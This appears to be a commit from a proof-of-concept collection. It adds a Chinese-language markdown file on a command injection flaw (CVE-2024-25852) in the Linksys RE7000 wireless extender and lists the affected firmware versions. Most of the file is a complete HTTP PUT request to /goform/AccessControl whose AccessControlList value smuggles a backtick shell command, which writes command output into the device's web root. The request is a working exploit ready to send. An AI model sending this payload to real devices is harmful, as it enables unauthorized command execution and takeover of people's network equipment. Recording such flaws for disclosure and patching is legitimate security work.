Create Linksys-RE7000无线扩展器命令执行漏洞(CVE-2024-25852).md
This commit is contained in:
parent
9472ed3f6b
commit
b5697b0507
29
Linksys-RE7000无线扩展器命令执行漏洞(CVE-2024-25852).md
Normal file
29
Linksys-RE7000无线扩展器命令执行漏洞(CVE-2024-25852).md
Normal file
@ -0,0 +1,29 @@
|
||||
## Linksys-RE7000无线扩展器命令执行漏洞(CVE-2024-25852)
|
||||
|
||||
RE7000无线扩展器在访问控制功能点的“AccessControlList”参数中存在命令执行漏洞。攻击者可以利用该漏洞获取设备管理员权限。
|
||||
|
||||
## 受影响的版本:
|
||||
```
|
||||
RE7000 v2.0.9、RE7000 v2.0.11、RE7000 v2.0.15
|
||||
```
|
||||
|
||||
## poc
|
||||
```
|
||||
PUT /goform/AccessControl HTTP/1.1
|
||||
Host: ip
|
||||
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
||||
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
||||
If-Modified-Since: Thu, 17 Sep 2020 11:24:58 GMT
|
||||
If-None-Match: "14600429"
|
||||
Content-Length: 81
|
||||
|
||||
{"AccessPolicy":"0","AccessControlList":"`ps>/etc_ro/lighttpd/RE7000_www/1.txt`"}
|
||||
```
|
||||
|
||||

|
||||
|
||||

|
||||
Loading…
x
Reference in New Issue
Block a user